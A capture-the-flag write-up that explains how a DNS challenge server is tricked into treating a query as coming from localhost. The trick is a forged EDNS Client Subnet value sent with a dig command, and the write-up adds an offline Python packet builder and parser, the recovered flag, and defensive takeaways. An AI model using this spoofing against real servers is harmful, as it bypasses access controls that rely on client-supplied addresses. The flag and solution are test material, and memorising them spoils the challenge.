BluehensCTF web/DNS
My solution for BluehensCTF web/DNS challenge
Challenge overview
The challenge presents a DNS server that reveals a secret flag only when queried from the IP address 127.0.0.1. The goal is to make the DNS server think we’re connecting from localhost.
Given information:
- DNS server: 129.153.36.153
- Required query: dig TXT flag @129.153.36.153
Initial Analysis
First, let’s perform a basic DNS query to understand what we’re dealing with:
$ dig TXT flag @129.153.36.153
;; ANSWER SECTION:
flag. 86400 IN TXT "Hi RE.DA.CT.ED, you need to be 127.0.0.1 to get the flag."
The response shows that:
- The server recognizes our real IP address (RE.DA.CT.ED)
- It explicitly tells us we need to appear as 127.0.0.1
- The record has a TTL of 86400 seconds (24 hours)
Analysis
To solve this challenge we can use EDNS Client Subnet (ECS), an EDNS0 option with which a recursive resolver tells an authoritative server which network the client it is resolving for sits in. The value travels inside the query itself, so whoever builds the packet chooses it. If the server reads the client address from that option instead of from the packet's source address, we can claim to be 127.0.0.1 without spoofing anything at the IP layer.
The dig command provides the +subnet option to send this option (a bare address is sent as a full /32 prefix):
$ dig TXT flag @129.153.36.153 +subnet=127.0.0.1
;; ANSWER SECTION:
flag. 86400 IN TXT "UDCTF{sp00fing_5ucc3ss_127_0_0_1_f728bf}"
Understanding EDNS Client Subnet
EDNS Client Subnet (ECS) is specified in RFC 7871. It lets a recursive resolver pass a prefix of the querying client's address on to an authoritative server, and it is commonly used for:
- CDN optimization
- Geographic DNS responses
- Load balancing
When you add the +subnet option to a dig query:
- It adds an EDNS0 OPT pseudo-record to the additional section of the query
- This record contains the CLIENT-SUBNET option (option code 8)
- The option carries the address family (1 for IPv4, 2 for IPv6), a source prefix length, a scope prefix length (0 in queries) and the address itself, truncated to the prefix length
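To make the option concrete, the following is an added example (not code from the original write-up, from dig or from the challenge) that builds the same query dig +subnet=127.0.0.1 sends, byte by byte, and parses the ECS option back out the way a server would. The function names build_ecs_option, build_query, parse_ecs and claimed_client are my own; claimed_client models a hypothetical server that prefers the ECS address over the UDP source address, which is the trust mistake this challenge exploits. Nothing is sent over the network.

```python
"""Build and parse a DNS query carrying an EDNS Client Subnet (ECS) option.

Added example for this write-up, not the challenge's or dig's code. It
follows the wire format from RFC 7871 section 6 and runs fully offline.
"""
import ipaddress
import struct

OPT_RRTYPE = 41                    # EDNS0 OPT pseudo-RR type (RFC 6891)
ECS_OPTION_CODE = 8                # CLIENT-SUBNET option code (RFC 7871)
FAMILY_IPV4, FAMILY_IPV6 = 1, 2    # IANA address family numbers used by ECS
QTYPE_TXT = 16


def encode_name(name):
    """Wire-encode a DNS name: "flag." -> b"\\x04flag\\x00"."""
    out = b""
    for label in name.rstrip(".").split("."):
        if label:
            out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_ecs_option(address, prefix_len=None):
    """Return a complete ECS option: code, length, then
    FAMILY(2) SOURCE-PREFIX-LENGTH(1) SCOPE-PREFIX-LENGTH(1) ADDRESS.
    Like dig, a bare address is sent as a full /32 or /128 prefix. ADDRESS is
    truncated to ceil(prefix_len / 8) bytes with bits past the prefix zeroed."""
    ip = ipaddress.ip_address(address)
    family = FAMILY_IPV4 if ip.version == 4 else FAMILY_IPV6
    if prefix_len is None:
        prefix_len = ip.max_prefixlen
    nbytes = (prefix_len + 7) // 8
    network = ipaddress.ip_network(f"{ip}/{prefix_len}", strict=False)
    data = struct.pack("!HBB", family, prefix_len, 0)  # SCOPE is always 0 in queries
    data += network.network_address.packed[:nbytes]
    return struct.pack("!HH", ECS_OPTION_CODE, len(data)) + data


def build_query(qname, qtype, ecs_address, ecs_prefix=None, txid=0x1234):
    """Build the UDP payload for `dig <qtype> <qname> +subnet=<addr>`."""
    # Header: id, flags (RD set), QDCOUNT=1, ANCOUNT=0, NSCOUNT=0, ARCOUNT=1 (the OPT RR)
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 1)
    question = encode_name(qname) + struct.pack("!HH", qtype, 1)  # class IN
    rdata = build_ecs_option(ecs_address, ecs_prefix)
    # OPT RR: root name, TYPE 41, CLASS = UDP payload size, TTL = ext-rcode/version/flags
    opt = b"\x00" + struct.pack("!HHIH", OPT_RRTYPE, 4096, 0, len(rdata)) + rdata
    return header + question + opt


def skip_name(buf, off):
    """Return the offset just past the DNS name starting at buf[off]."""
    while True:
        length = buf[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:       # compression pointer, 2 bytes total
            return off + 2
        off += 1 + length


def parse_ecs(packet):
    """Return (address, source_prefix_len) from the first ECS option, or None.
    The address is re-expanded from its truncated wire form; this is the value
    a server sees if it decides to trust ECS."""
    qd, an, ns, ar = struct.unpack("!HHHH", packet[4:12])
    off = 12
    for _ in range(qd):
        off = skip_name(packet, off) + 4       # QTYPE + QCLASS
    for _ in range(an + ns + ar):
        off = skip_name(packet, off)
        rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", packet[off:off + 10])
        off += 10
        rdata, off = packet[off:off + rdlen], off + rdlen
        if rtype != OPT_RRTYPE:
            continue
        pos = 0
        while pos + 4 <= len(rdata):
            code, length = struct.unpack("!HH", rdata[pos:pos + 4])
            body = rdata[pos + 4:pos + 4 + length]
            pos += 4 + length
            if code != ECS_OPTION_CODE:
                continue
            family, src_len, _scope = struct.unpack("!HBB", body[:4])
            width = 4 if family == FAMILY_IPV4 else 16
            raw = body[4:].ljust(width, b"\x00")   # undo the RFC 7871 truncation
            return str(ipaddress.ip_address(raw)), src_len
    return None


def claimed_client(packet, udp_source_ip):
    """Hypothetical server logic (illustration only): prefer the ECS address
    over the real UDP source. ECS is set by whoever sends the packet, so a
    server that does this lets any client claim to be 127.0.0.1."""
    ecs = parse_ecs(packet)
    return ecs[0] if ecs else udp_source_ip


if __name__ == "__main__":
    q = build_query("flag", QTYPE_TXT, "127.0.0.1")
    print(q.hex())
    print(parse_ecs(q))                       # ('127.0.0.1', 32)
    print(claimed_client(q, "203.0.113.5"))   # 127.0.0.1, although the packet came from 203.0.113.5
```

The hex dump printed by the main block is the exact payload you would see in a packet capture of the dig command above; the four bytes 00 01 20 00 after the option header are family 1, prefix length 32, scope 0, followed by 7f 00 00 01. Note also how a /24 prefix is sent as only three address bytes and padded back out by the parser.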
Flag
UDCTF{sp00fing_5ucc3ss_127_0_0_1_f728bf}
Learning Resources
To learn more about EDNS Client Subnet and dig options:
- RFC 7871: Client Subnet in DNS Queries
- man dig documentation, specifically the “+subnet” option
- IETF DNS Operations Working Group documents
Conclusion
This challenge shows that EDNS Client Subnet is just data inside the query: whoever builds the packet chooses the address it carries. A server that bases an access decision on that option, rather than on the address the packet actually came from, can be convinced that any client is 127.0.0.1 with a single dig option.
Key Takeaways
- DNS queries can include additional information through EDNS options
- The Client Subnet option can be used to specify the client’s network location
- Always check dig’s manual (man dig) for useful options when solving DNS challenges
- ECS is client-controlled input; a server must never use it for authorization in place of the real source address